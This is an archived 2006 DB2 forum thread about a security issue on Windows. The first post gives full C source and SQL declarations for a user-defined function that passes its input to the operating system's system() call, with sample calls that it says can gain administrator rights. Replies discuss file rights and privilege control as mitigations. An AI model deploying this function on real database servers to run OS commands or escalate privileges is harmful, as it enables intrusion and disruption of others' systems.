Home | Contact Us | FAQ | Search & Site Map | Link to Us
Sign In | Join | Other 45 Sites in Network
Home
Discussion Groups
Database Servers
DB2InformixIngresMS SQLOraclePervasive.SQLPostgreSQLProgressSybase
Desktop Databases
FileMakerFoxProMS AccessParadox
General
General DB TopicsDatabase Theory
Related Topics
Java Development.NET DevelopmentVB DevelopmentMore Topics ...
Database Forum / DB2 Topics / November 2006

Tip: Looking for answers? Try searching our database.

Security issue with system call from C udf on Windows

Thread view: 
Enable EMail Alerts  Start New Thread
Thread rating: 
4.spam@mail.ru - 30 Nov 2006 14:12 GMT
Hello.

v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>

void SQL_API_FN systemCall(
       SQLUDF_VARCHAR *command,     /* input */
       SQLUDF_INTEGER *result,      /* output */
       /* null indicators */
       SQLUDF_NULLIND *command_ind,
       SQLUDF_NULLIND *result_ind,
       SQLUDF_TRAIL_ARGS)
{
   int rc = 0;
   /* execute the command */
   rc = system(command);
   *result_ind = 0;
   *result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
  RETURNS INTEGER
  SPECIFIC systemCall
  EXTERNAL NAME 'os_call!systemCall'
  LANGUAGE C
  PARAMETER STYLE SQL
  DETERMINISTIC
  FENCED
  RETURNS NULL ON NULL INPUT
  NO SQL
  EXTERNAL ACTION
  NO SCRATCHPAD
  DISALLOW PARALLEL;
--- udf declaration end ---

And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_administrative_account')

For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.

What do you think about this?

Sincerely,
Mark B.
Reply to this Message
Gert van der Kooij - 30 Nov 2006 14:35 GMT
> Hello.
>
[quoted text clipped - 53 lines]
> Sincerely,
> Mark B.

You need the rights to put the C module in the instance directory so if
you enable extended OS security you must belong to the DB2ADM system
group to do that. Only administrators should be allowed in this group so
it should not be a real issue.
Reply to this Message
4.spam@mail.ru - 30 Nov 2006 15:01 GMT
> You need the rights to put the C module in the instance directory so if
> you enable extended OS security you must belong to the DB2ADM system
> group to do that. Only administrators should be allowed in this group so
> it should not be a real issue.

But I can have rights to put module anywhere in the LIBPATH or PATH of
the instance owner or use absolute path for registering.
In the last case it will be enough to find any path in the server where
administrator has rights to read and I have rights to write...
Reply to this Message
Knut Stolze - 30 Nov 2006 23:17 GMT
> Hello.
>
[quoted text clipped - 50 lines]
>
> What do you think about this?

I guess that's a very good example illustrating that the DBA should really
take care of privileges and who is allowed to created what kind of objects.
Your UDF directly exposes capabilities of the OS through SQL.  You could
achieve the same with a different, more obfuscated UDF as well.

Signature

Knut Stolze
DB2 Information Integration Development
IBM Germany

Reply to this Message
 
Sign In
Join
My Latest Posts
My Monitored Threads
My Blog
My Photo Gallery
My Profile
My Homepage
Start New Thread
Enable EMail Alerts
Rate this Thread



©2008 Advenet LLC   Privacy Policy - Terms of Use
This website includes both content owned or controlled by Advenet as well as content owned or controlled by third parties.